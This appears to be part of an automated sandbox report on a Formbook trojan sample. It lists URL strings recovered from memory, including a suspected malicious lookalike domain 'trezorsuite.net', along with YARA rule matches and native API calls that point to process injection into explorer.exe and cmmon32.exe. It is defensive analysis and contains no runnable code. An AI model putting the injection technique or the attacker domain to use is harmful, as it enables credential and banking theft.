                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trezorsuite.net/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trezorsuite.net/ps15/www.gomenasorry.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trezorsuite.netReferer:
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                Source: explorer.exe, 0000000C.00000003.2271650261.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000C.00000002.3737130665.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000C.00000000.1312007503.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/

                E-Banking Fraud

                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1540, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: cmmon32.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: xU0wdBC6XWRZ6UY.exe, Cows.csLarge array initialization: : array initializer size 653909
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A350 NtCreateFile,11_2_0041A350
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A400 NtReadFile,11_2_0041A400
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A480 NtClose,11_2_0041A480
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A530 NtAllocateVirtualMemory,11_2_0041A530
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A2C2 NtCreateFile,11_2_0041A2C2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A3FA NtReadFile,11_2_0041A3FA
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A47C NtClose,11_2_0041A47C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062B60 NtClose,LdrInitializeThunk,11_2_01062B60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_01062BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062AD0 NtReadFile,LdrInitializeThunk,11_2_01062AD0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062D10 NtMapViewOfSection,LdrInitializeThunk,11_2_01062D10
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_01062D30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062DD0 NtDelayExecution,LdrInitializeThunk,11_2_01062DD0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_01062DF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01062C70
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_01062CA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062F30 NtCreateSection,LdrInitializeThunk,11_2_01062F30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062F90 NtProtectVirtualMemory,LdrInitializeThunk,11_2_01062F90
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062FB0 NtResumeThread,LdrInitializeThunk,11_2_01062FB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062FE0 NtCreateFile,LdrInitializeThunk,11_2_01062FE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_01062E80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_01062EA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01064340 NtSetContextThread,11_2_01064340
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01064650 NtSuspendThread,11_2_01064650
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062B80 NtQueryInformationFile,11_2_01062B80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062BA0 NtEnumerateValueKey,11_2_01062BA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062BE0 NtQueryValueKey,11_2_01062BE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062AB0 NtWaitForSingleObject,11_2_01062AB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062AF0 NtWriteFile,11_2_01062AF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062D00 NtSetInformationFile,11_2_01062D00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062DB0 NtEnumerateKey,11_2_01062DB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062C00 NtQueryInformationProcess,11_2_01062C00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062C60 NtCreateKey,11_2_01062C60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062CC0 NtQueryVirtualMemory,11_2_01062CC0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062CF0 NtOpenProcess,11_2_01062CF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062F60 NtCreateProcessEx,11_2_01062F60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062FA0 NtQuerySection,11_2_01062FA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062E30 NtWriteVirtualMemory,11_2_01062E30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062EE0 NtQueueApcThread,11_2_01062EE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063010 NtOpenDirectoryObject,11_2_01063010
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063090 NtSetValueKey,11_2_01063090
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010635C0 NtCreateMutant,11_2_010635C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010639B0 NtGetContextThread,11_2_010639B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063D10 NtOpenProcessToken,11_2_01063D10
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063D70 NtOpenThread,11_2_01063D70
                Source: C:\Windows\explorer.exeCode function: 12_2_0869E232 NtCreateFile,12_2_0869E232
                Source: C:\Windows\explorer.exeCode function: 12_2_0869FE12 NtProtectVirtualMemory,12_2_0869FE12
                Source: C:\Windows\explorer.exeCode function: 12_2_0869FE0A NtProtectVirtualMemory,12_2_0869FE0A
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04C32CA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32C60 NtCreateKey,LdrInitializeThunk,14_2_04C32C60
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04C32C70
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32DD0 NtDelayExecution,LdrInitializeThunk,14_2_04C32DD0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04C32DF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04C32D10
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04C32EA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32FE0 NtCreateFile,LdrInitializeThunk,14_2_04C32FE0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32F30 NtCreateSection,LdrInitializeThunk,14_2_04C32F30
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32AD0 NtReadFile,LdrInitializeThunk,14_2_04C32AD0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04C32BE0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04C32BF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32B60 NtClose,LdrInitializeThunk,14_2_04C32B60
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C335C0 NtCreateMutant,LdrInitializeThunk,14_2_04C335C0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C34650 NtSuspendThread,14_2_04C34650
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C34340 NtSetContextThread,14_2_04C34340
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32CC0 NtQueryVirtualMemory,14_2_04C32CC0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32CF0 NtOpenProcess,14_2_04C32CF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32C00 NtQueryInformationProcess,14_2_04C32C00
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32DB0 NtEnumerateKey,14_2_04C32DB0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32D00 NtSetInformationFile,14_2_04C32D00
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C32BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C33090 NtSetValueKey
                Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 14_2_04C33010 NtOpenDirectoryObject
